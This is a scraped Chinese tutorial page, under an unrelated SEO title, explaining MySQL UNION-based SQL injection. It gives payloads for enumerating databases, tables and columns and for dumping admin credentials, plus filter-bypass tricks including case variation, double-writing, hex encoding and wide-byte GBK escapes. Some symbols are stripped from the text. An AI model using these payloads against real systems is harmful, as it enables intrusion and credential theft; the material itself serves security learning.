当前位置: 首页 > news >正文

国内做的好网站有哪些企业it外包

国内做的好网站有哪些,企业it外包,个人网站 名称,wordpress 3.3.2联合注入的原理 在SQL语句中查询数据时#xff0c;使用select 相关语句与where 条件子句筛选符合条件的记录。 select * from person where id 1; #在person表中#xff0c;筛选出id1的记录如果该id1 中的1 是用户可以控制输入的部分时#xff0c;就有可能存在SQL注入漏洞…联合注入的原理 在SQL语句中查询数据时使用select 相关语句与where 条件子句筛选符合条件的记录。 select * from person where id 1; #在person表中筛选出id1的记录如果该id1 中的1 是用户可以控制输入的部分时就有可能存在SQL注入漏洞。 数据库提供联合查询使得可以将两条SQL查询语句的结果进行连接。务必注意两者的字段数必须一致。 select * from person where id 1 union select 1,2,database(),4,5;判断联合查询语句中的字段数时可以使用order by num 。当依次增大num时如果出现错误那么上 一条SQL查询语句的结果字段数就为num-1。 联合查询利用SQL注入漏洞语句 1执行联合查询 select * from person where id 1 union select 1,2,3,4,5; 2查询数据库名、版本号、用户信息 select * from person where id 1 union select 1,2,database(),version(),user();3查询数据表名 select * from person where id 1 union select 1,2,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),4,5; 或 select * from person where id 1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),4,5; 4查询字段名 select * from person where id 1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_nameadmin),4,5; 或 select * from person where id 1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name0x61646D696E),4,5;5查询具体数据 select * from person where id 1 union select 1,concat(username,0x5c,password),3,4,5 from admin; 或select * from person where id 1 union select 1,concat(username,0x5c,password),3,4,5 from admin limit 0,2; 联合注入不适用情形 1、union关键字被完全过滤 2、页面中压根不返回查询数据 联合注入过滤绕过技巧 1、大小写绕过 基础在Mysql中大小写字母的含义是一致的。如果在进行过滤提交的数据过程中没有对大小 进行区分那么此时就会造成大小写绕过过滤的情况。 以上代码都只匹配到union并没有过滤大写字母因此可以使用 大小写绕过。 2、双写绕过 基础在使用 preg_replace 函数过程中默认情况下 只进行一次匹配。因此如果匹配到字符替换 为空的情况 就可以造成双写绕过。 以上代码使用i 表示大小写全部匹配此时无法使用双写绕过。但是由于preg_replace默认只匹配一次 过滤字符因此可以使用双写绕过。 3、过滤单引号绕过 十六进制 基础在Mysql数据库中的SQL语句对于字符串数据必须使用引号。但是对于字符串来说Mysql 也识别 字符串中每个字符对应的ASCII码的16进制此时可以使用 0x16进制替换字符串。从而绕过 引号对字符串的限制。 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是 单引号 双引号 反斜杠\ NULL 该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。 在php.ini配置文件中开启 magic_quotes_gpc 选项此时对于数字型注入来说如果需要进行数 据库中数据获取需要使用十六进制进行绕过。但是对于字符型注入来说就需要进行逃逸引号的操 作。 4、宽字节注入原理与利用 基础如果数据库中存储数据使用 的编码方式是 GBK那么由于用户输入的内容会进行双字节的 组合会导致用户输入的字节与反斜杠组合从而逃逸引号。 宽字节注入可以说是一种逃逸引号的技巧利用双字节组合导致注入产生。 注意有一种情况下无法使用 联合查询注入利用方式preg_match(/union/i,$sql) 完全过滤。
http://www.w-s-a.com/news/827857/

相关文章:

  • 网站建设报价怎么差别那么大wordpress产品属性搭配
  • 高校网站建设情况报告范文pc建站网站
  • 做网站美工要学什么广东省建设厅网站首页
  • 深圳网站设计十年乐云seo网站建设 竞赛 方案
  • 新乡移动网站建设wordpress输出某一分类的文章
  • 花店网站开发设计的项目结构重庆网站建设培训班
  • 做网站的技术体系投资者互动平台官网
  • 北京网站建设公司哪家实惠企查查在线查询入口
  • 毕业设计做网站怎么样非微信官方网页自己做的网站
  • 昆明网站多端小程序设计重庆市住房和城乡建设厅网站
  • 网站制作技术人员国际新闻最新10条
  • 做同城特价的网站wordpress后台能修改模板文件
  • 网站信息可以边建设边组织产品展示网站源码php
  • 电子商务网站规划从哪些方面入手途牛企业网站建设方案
  • 莱阳网站定制易语言可以做网站嘛
  • 购物网站开发意义上海中小企业服务中心官网
  • 网站备案证书如何打开江苏网站建设电话
  • 深圳网站建设乐云seo搜索引擎优化seo目的
  • 中山城市建设集团网站网站建设设计基础
  • 网站开发流程莆田wordpress点播收费
  • 网站未及时续费浙江台州做网站的公司有哪些
  • 二级域名做网站好不好河源建网站
  • 公司网站的作用意义维护建设管理天津平台网站建设费用
  • 建设部网站如何下载国标规范上海影视公司
  • 企业官方网站地址通了网站建设
  • 专题网站可以做什么怎么做网站滑动图片部分h5
  • 什么是网站建设外包html 门户网站
  • 资阳市建设局网站微信开发公司
  • wap建站程序源码可不可以异地建设网站
  • 优秀企业网站的特点网站标签名词